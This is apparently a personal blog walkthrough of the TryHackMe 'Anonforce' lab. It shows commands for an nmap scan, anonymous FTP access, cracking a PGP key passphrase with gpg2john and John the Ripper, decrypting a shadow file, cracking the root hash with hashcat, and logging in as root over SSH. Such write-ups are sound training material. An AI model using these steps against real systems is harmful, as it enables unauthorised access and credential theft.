christopher di-nozzi

---

TryHackMe Walkthrough - Anonforce

PGP? GPG? PGGPPGG?

12/01/2021

Now that I have some time off of university, I thought I’d try and get some old TryHackMe rooms done. I decided to start off easy and work my way up, so lets give “Anonforce” a go!

Enumeration

I started off a with nice and easy nmap scan. I scanned all the ports (just in case) and threw the “-sV” flag on there for good measure. The scan didn’t take too long but it wasn’t incredibly exciting.

PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux\_kernel

User Flag

Lets give the FTP server a shot. I tried connecting to it using user anonymous and password anonymous, and it worked a treat!

ftp 10.10.42.70
Connected to 10.10.42.70.
220 (vsFTPd 3.0.3)
Name (10.10.42.70:chris): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>

From here, I moved into the home directory and found the home folder of the user “melodias”. Moving into that directory, I found the user flag! I use the “get” command to download it and opened it up on my local machine! Easy peasy! One flag down, one to go!

Root Flag

Now for the root flag. After snooping around for a bit I noticed a folder in the root directory called “notread”.

ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 0 0 4096 Aug 11 2019 bin
drwxr-xr-x 3 0 0 4096 Aug 11 2019 boot
drwxr-xr-x 17 0 0 3700 Jan 12 03:41 dev
drwxr-xr-x 85 0 0 4096 Aug 13 2019 etc
drwxr-xr-x 3 0 0 4096 Aug 11 2019 home
lrwxrwxrwx 1 0 0 33 Aug 11 2019 initrd.img -> boot/initrd.img-4.4.0-157-generic
lrwxrwxrwx 1 0 0 33 Aug 11 2019 initrd.img.old -> boot/initrd.img-4.4.0-142-generic
drwxr-xr-x 19 0 0 4096 Aug 11 2019 lib
drwxr-xr-x 2 0 0 4096 Aug 11 2019 lib64
drwx------ 2 0 0 16384 Aug 11 2019 lost+found
drwxr-xr-x 4 0 0 4096 Aug 11 2019 media
drwxr-xr-x 2 0 0 4096 Feb 26 2019 mnt
drwxrwxrwx 2 1000 1000 4096 Aug 11 2019 notread
drwxr-xr-x 2 0 0 4096 Aug 11 2019 opt
dr-xr-xr-x 95 0 0 0 Jan 12 03:41 proc
drwx------ 4 0 0 4096 Jan 12 04:05 root
drwxr-xr-x 18 0 0 560 Jan 12 04:05 run
drwxr-xr-x 2 0 0 12288 Aug 11 2019 sbin
drwxr-xr-x 3 0 0 4096 Aug 11 2019 srv
dr-xr-xr-x 13 0 0 0 Jan 12 03:41 sys
drwxrwxrwt 9 0 0 4096 Jan 12 03:41 tmp
drwxr-xr-x 10 0 0 4096 Aug 11 2019 usr
drwxr-xr-x 11 0 0 4096 Aug 11 2019 var
lrwxrwxrwx 1 0 0 30 Aug 11 2019 vmlinuz -> boot/vmlinuz-4.4.0-157-generic
lrwxrwxrwx 1 0 0 30 Aug 11 2019 vmlinuz.old -> boot/vmlinuz-4.4.0-142-generic
226 Directory send OK.

Out of respect, I didn’t look into the folder any further.
Just kidding!
Moving into it I found two files – “backup.pgp” and “private.asc”. I won’t lie, I didn't know the first thing about PGP or GPG so I had to do some research here. It turns out, we should be able to view the contents of “backup.pgp” using the “private.asc” file as a key! Good stuff! I downloaded both file onto my machine. I started by trying to add the “private.asc” to my key bank using the command:

gpg --import private.asc

I was then prompted for a password. I don’t know the password so lets crack it! Using “gpg2john”, a tool that comes with John the Ripper, I was able to turn "private.asc" into a file that john could crack!

gpg2john private.asc > key

Then I ran john against my new "key" file. What would you know, it cracked it almost instantly! I used the "--show" flag to view the password.

john key john key --show

I could then run the import command again and use the new found password to import the key! Awesome! Now we use GPG to decrypt our other file!

gpg --decrypt backup.pgp

This outputted what seemed to be a copy of the “shadow” file from the server, containing a hash of the root password! This should be simple enough to crack! I move the hash into a file called "root.hash", and using hashcat and the rockyou.txt wordlist, made quick work of it!

hashcat -a 0 -m 1800 root.hash /usr/share/wordlists/rockyou.txt

After a few moments I had the root password! I could use this password to SSH as root onto the server and grab the flag!

ssh root@IP cat root.txt

Conclusion

Overall this room was quite straightforward! The only challenge I had was with the PGP/GPG keys as I’ve never used them before! If you’re familiar with them I think you’d breeze through this room no problem!